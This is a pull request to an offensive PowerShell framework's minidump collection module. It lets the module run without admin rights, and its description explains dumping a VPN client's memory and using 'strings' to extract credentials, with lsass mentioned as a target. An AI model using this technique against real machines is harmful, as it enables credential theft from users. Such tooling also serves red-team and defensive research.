### PR TITLE
Modify minidump module to allow non-admin to dump process

### DIFF
--- a/lib/modules/powershell/collection/minidump.py
+++ b/lib/modules/powershell/collection/minidump.py
@@ -89,9 +89,9 @@ class Module:
             if option.lower() != "agent":
                 if values['Value'] and values['Value'] != '':
                     if option == "ProcessName":
-                        scriptEnd += "Get-Process " + values['Value'] + " | Out-Minidump"
+                        scriptEnd = "Get-Process " + values['Value'] + " | Out-Minidump"
                     elif option == "ProcessId":
-                        scriptEnd += "Get-Process -Id " + values['Value'] + " | Out-Minidump"
+                        scriptEnd = "Get-Process -Id " + values['Value'] + " | Out-Minidump"
         
         for option,values in self.options.iteritems():
             if values['Value'] and values['Value'] != '':

--- a/lib/modules/powershell/collection/minidump.py
+++ b/lib/modules/powershell/collection/minidump.py
@@ -9,13 +9,13 @@ class Module:
 
             'Author': ['@mattifestation'],
 
-            'Description': ('Generates a full-memory minidump of a process.'),
+            'Description': ('Generates a full-memory dump of a process. Note: To dump another user\'s process, you must be running from an elevated prompt (e.g to dump lsass)'),
 
             'Background' : True,
 
             'OutputExtension' : None,
             
-            'NeedsAdmin' : True,
+            'NeedsAdmin' : False,
 
             'OpsecSafe' : False,
 


### PR DESCRIPTION
Hi,
Simple PR to allow dumping a process from an unprivileged session with the minidump module. For example it's really useful to dump the VPN client's process (and "strings" for credentials) from an non Administrator user. Besides that, the logic within the module to handle `ProcessName` and `ProcessId` is buggy and I think it needs to be rewritten...

🌻 